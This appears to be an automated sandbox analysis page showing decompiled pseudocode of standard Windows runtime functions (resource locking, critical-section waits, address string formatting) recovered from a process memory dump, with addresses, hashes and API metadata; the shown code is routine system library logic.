                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539153
                                                                                                                                                    0x02539158
                                                                                                                                                    0x0253915a
                                                                                                                                                    0x0253915e
                                                                                                                                                    0x02539160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539171
                                                                                                                                                    0x02539176
                                                                                                                                                    0x02539176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539160
                                                                                                                                                    0x025423c6
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02542373
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542293
                                                                                                                                                    0x02542295
                                                                                                                                                    0x0254229a
                                                                                                                                                    0x025422a1
                                                                                                                                                    0x025422a3
                                                                                                                                                    0x025422a7
                                                                                                                                                    0x025422a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422ab
                                                                                                                                                    0x025422ad
                                                                                                                                                    0x025422af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422af
                                                                                                                                                    0x025422b1
                                                                                                                                                    0x025422b4
                                                                                                                                                    0x025422b4
                                                                                                                                                    0x025422b6
                                                                                                                                                    0x025053be
                                                                                                                                                    0x025053be
                                                                                                                                                    0x025053be
                                                                                                                                                    0x025053c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025053cb
                                                                                                                                                    0x025053ce
                                                                                                                                                    0x025053d0
                                                                                                                                                    0x025053d4
                                                                                                                                                    0x025053d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025053d8
                                                                                                                                                    0x025053e3
                                                                                                                                                    0x025053ea
                                                                                                                                                    0x025053ea
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025053d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254228f
                                                                                                                                                    0x02542349
                                                                                                                                                    0x0254234d
                                                                                                                                                    0x02542251
                                                                                                                                                    0x02542251
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542251
                                                                                                                                                    0x025421a4
                                                                                                                                                    0x025421a4
                                                                                                                                                    0x025421a6
                                                                                                                                                    0x025421a8
                                                                                                                                                    0x025421ac
                                                                                                                                                    0x025421b6
                                                                                                                                                    0x025421b8
                                                                                                                                                    0x025421bc
                                                                                                                                                    0x025421be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025421c0
                                                                                                                                                    0x025421c2
                                                                                                                                                    0x025421c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025421c4
                                                                                                                                                    0x025421c6
                                                                                                                                                    0x025421c6
                                                                                                                                                    0x025421c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025421c8
                                                                                                                                                    0x025421a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542183
                                                                                                                                                    0x0252057b
                                                                                                                                                    0x0252057d
                                                                                                                                                    0x02520581
                                                                                                                                                    0x02520583
                                                                                                                                                    0x02542178
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02520589
                                                                                                                                                    0x0252058f
                                                                                                                                                    0x0252058f
                                                                                                                                                    0x02520583
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02542206
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-4236105082
                                                                                                                                                    • Opcode ID: 9469cab7991303735dddfe00092845cdfb858b218bfea2efab557bcef9c2ec08
                                                                                                                                                    • Instruction ID: 4b1e220cb7483a349f0dd8fa2d42bfa3e9af2af52715fcee311336abd15630f9
                                                                                                                                                    • Opcode Fuzzy Hash: 9469cab7991303735dddfe00092845cdfb858b218bfea2efab557bcef9c2ec08
                                                                                                                                                    • Instruction Fuzzy Hash: 5F5149317042226FEB15CE18CC80FA677AABFD4729F215259FC45DB2C4EA31EC458B98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 025214C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                    			E025214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x25c2088; // 0x767370ef
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02517707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E025213CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02517707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02517707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E024E2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E024EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                                                                                                    0x025214c0
                                                                                                                                                    0x025214cb
                                                                                                                                                    0x025214d2
                                                                                                                                                    0x025214d6
                                                                                                                                                    0x025214da
                                                                                                                                                    0x025214de
                                                                                                                                                    0x025214e3
                                                                                                                                                    0x0252157a
                                                                                                                                                    0x0252157a
                                                                                                                                                    0x025214f1
                                                                                                                                                    0x025214f3
                                                                                                                                                    0x0254ea0f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ea15
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ea15
                                                                                                                                                    0x025214f9
                                                                                                                                                    0x025214f9
                                                                                                                                                    0x025214fe
                                                                                                                                                    0x02521504
                                                                                                                                                    0x0254ea1a
                                                                                                                                                    0x0254ea1f
                                                                                                                                                    0x0254ea21
                                                                                                                                                    0x0254ea22
                                                                                                                                                    0x0254ea27
                                                                                                                                                    0x0254ea2a
                                                                                                                                                    0x0254ea2a
                                                                                                                                                    0x02521515
                                                                                                                                                    0x02521517
                                                                                                                                                    0x0252156d
                                                                                                                                                    0x02521572
                                                                                                                                                    0x02521575
                                                                                                                                                    0x02521575
                                                                                                                                                    0x0252151e
                                                                                                                                                    0x0254ea50
                                                                                                                                                    0x0254ea55
                                                                                                                                                    0x0254ea58
                                                                                                                                                    0x0254ea58
                                                                                                                                                    0x0252152e
                                                                                                                                                    0x02521531
                                                                                                                                                    0x02521533
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02521535
                                                                                                                                                    0x02521541
                                                                                                                                                    0x02521549
                                                                                                                                                    0x02521549
                                                                                                                                                    0x02521533
                                                                                                                                                    0x025214f3
                                                                                                                                                    0x02521559

                                                                                                                                                    APIs
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0254EA22
                                                                                                                                                      • Part of subcall function 025213CB: ___swprintf_l.LIBCMT ref: 0252146B
                                                                                                                                                      • Part of subcall function 025213CB: ___swprintf_l.LIBCMT ref: 02521490
                                                                                                                                                    • ___swprintf_l.LIBCMT ref: 0252156D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                                    • Opcode ID: da0b8cd3d479ab947fb1bacbc33dfdfd96e2f4b451df79f8a73328bb679d21bb
                                                                                                                                                    • Instruction ID: c8d4dca7a1c956773ba0925fb6bbdbd34440fbdd4c17480d1273cc5db641556b
                                                                                                                                                    • Opcode Fuzzy Hash: da0b8cd3d479ab947fb1bacbc33dfdfd96e2f4b451df79f8a73328bb679d21bb
                                                                                                                                                    • Instruction Fuzzy Hash: 2D21C272A00A299BDF21DE58CC40AEFB7ACBF55305F448456EC4AD3181DB70AA588FD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 025053A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                                    			E025053A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x025c01c0;
									_push(_t92);
									_push(0);
									_t37 = E024DF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02524FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02533F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02533F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0256217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02533F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02523915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02505384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E024DF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02523915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E024DF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02523915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E024DF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02523915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02505329(_t74, _t92);
													_push(1);
													return E025053A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                                                                                                                    0x025053ab
                                                                                                                                                    0x025053ae
                                                                                                                                                    0x025053b1
                                                                                                                                                    0x025053b4
                                                                                                                                                    0x025053b7
                                                                                                                                                    0x025205b6
                                                                                                                                                    0x025205c0
                                                                                                                                                    0x025205c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025205c9
                                                                                                                                                    0x025205c9
                                                                                                                                                    0x025205cc
                                                                                                                                                    0x025205d5
                                                                                                                                                    0x025205d5
                                                                                                                                                    0x025053bd
                                                                                                                                                    0x025053bd
                                                                                                                                                    0x025053bd
                                                                                                                                                    0x025053be
                                                                                                                                                    0x025053be
                                                                                                                                                    0x025053be
                                                                                                                                                    0x025053c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542269
                                                                                                                                                    0x0254226d
                                                                                                                                                    0x02542349
                                                                                                                                                    0x0254234d
                                                                                                                                                    0x02542273
                                                                                                                                                    0x02542276
                                                                                                                                                    0x02542279
                                                                                                                                                    0x0254227e
                                                                                                                                                    0x02542283
                                                                                                                                                    0x02542287
                                                                                                                                                    0x0254228a
                                                                                                                                                    0x0254228d
                                                                                                                                                    0x0254228f
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422bc
                                                                                                                                                    0x025422be
                                                                                                                                                    0x025422c4
                                                                                                                                                    0x025422cc
                                                                                                                                                    0x025422d0
                                                                                                                                                    0x025422d6
                                                                                                                                                    0x025422d7
                                                                                                                                                    0x025422da
                                                                                                                                                    0x025422df
                                                                                                                                                    0x025422e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422e6
                                                                                                                                                    0x025422e9
                                                                                                                                                    0x025422f4
                                                                                                                                                    0x025422f9
                                                                                                                                                    0x025422fa
                                                                                                                                                    0x02542305
                                                                                                                                                    0x02542314
                                                                                                                                                    0x02542319
                                                                                                                                                    0x0254231a
                                                                                                                                                    0x0254231d
                                                                                                                                                    0x02542320
                                                                                                                                                    0x02542323
                                                                                                                                                    0x02542323
                                                                                                                                                    0x02542328
                                                                                                                                                    0x0254232d
                                                                                                                                                    0x0254232f
                                                                                                                                                    0x02542331
                                                                                                                                                    0x02542336
                                                                                                                                                    0x02542336
                                                                                                                                                    0x0254233b
                                                                                                                                                    0x0254233d
                                                                                                                                                    0x02542350
                                                                                                                                                    0x02542351
                                                                                                                                                    0x02542356
                                                                                                                                                    0x02542359
                                                                                                                                                    0x02542359
                                                                                                                                                    0x0254235b
                                                                                                                                                    0x0254235d
                                                                                                                                                    0x02505367
                                                                                                                                                    0x0250536b
                                                                                                                                                    0x02505372
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542363
                                                                                                                                                    0x02542363
                                                                                                                                                    0x02542369
                                                                                                                                                    0x0254236a
                                                                                                                                                    0x0254236c
                                                                                                                                                    0x02542371
                                                                                                                                                    0x02542373
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02542379
                                                                                                                                                    0x02542379
                                                                                                                                                    0x0254237a
                                                                                                                                                    0x0254237f
                                                                                                                                                    0x0254237f
                                                                                                                                                    0x02542385
                                                                                                                                                    0x02542386
                                                                                                                                                    0x02542389
                                                                                                                                                    0x0254238e
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02505378
                                                                                                                                                    0x0250537c
                                                                                                                                                    0x02542396
                                                                                                                                                    0x02542396
                                                                                                                                                    0x02542397
                                                                                                                                                    0x0254239c
                                                                                                                                                    0x025423a2
                                                                                                                                                    0x025423a3
                                                                                                                                                    0x025423a6
                                                                                                                                                    0x025423ab
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b3
                                                                                                                                                    0x025423b4
                                                                                                                                                    0x025423b9
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423ba
                                                                                                                                                    0x025423bc
                                                                                                                                                    0x025423bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539153
                                                                                                                                                    0x02539158
                                                                                                                                                    0x0253915a
                                                                                                                                                    0x0253915e
                                                                                                                                                    0x02539160
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539166
                                                                                                                                                    0x02539171
                                                                                                                                                    0x02539176
                                                                                                                                                    0x02539176
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02539160
                                                                                                                                                    0x025423c6
                                                                                                                                                    0x025423cb
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423d7
                                                                                                                                                    0x025423ad
                                                                                                                                                    0x02542390
                                                                                                                                                    0x02542373
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254233f
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542291
                                                                                                                                                    0x02542293
                                                                                                                                                    0x02542295
                                                                                                                                                    0x0254229a
                                                                                                                                                    0x025422a1
                                                                                                                                                    0x025422a3
                                                                                                                                                    0x025422a7
                                                                                                                                                    0x025422a9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422ab
                                                                                                                                                    0x025422ad
                                                                                                                                                    0x025422af
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422af
                                                                                                                                                    0x025422b1
                                                                                                                                                    0x025422b4
                                                                                                                                                    0x025422b4
                                                                                                                                                    0x025422b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025422b6
                                                                                                                                                    0x0254228f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254226d
                                                                                                                                                    0x025053cb
                                                                                                                                                    0x025053ce
                                                                                                                                                    0x025053d0
                                                                                                                                                    0x025053d4
                                                                                                                                                    0x025053d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x025053d8
                                                                                                                                                    0x025053e3
                                                                                                                                                    0x025053ea
                                                                                                                                                    0x025053ea
                                                                                                                                                    0x025053d6
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025422F4
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025422FC
                                                                                                                                                    • RTL: Resource at %p, xrefs: 0254230B
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 02542328
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                    • Opcode ID: 9932293b53c16352253d1f66e2140c44eaaa509fbdc771c22215d4a7027428ab
                                                                                                                                                    • Instruction ID: 198148aa8336803d15ce758401ed386a54124f3973a5b580c2e7ddae51fa3039
                                                                                                                                                    • Opcode Fuzzy Hash: 9932293b53c16352253d1f66e2140c44eaaa509fbdc771c22215d4a7027428ab
                                                                                                                                                    • Instruction Fuzzy Hash: 545116716106126BEB11DF28CC80FE677A9BF85328F104259FD05DB2C0FB61E8458FA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0250EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                    			E0250EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E024FDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x25c793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E024E16C0(_t39);
				} else {
					_t40 = E024DF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02523915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E024E01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x25c793c; // 0x0
								_push(_t85);
								_t44 = E024E1F28(_t71);
							} else {
								_t44 = E024DF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02523915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02562306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0250EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02524FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02533F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
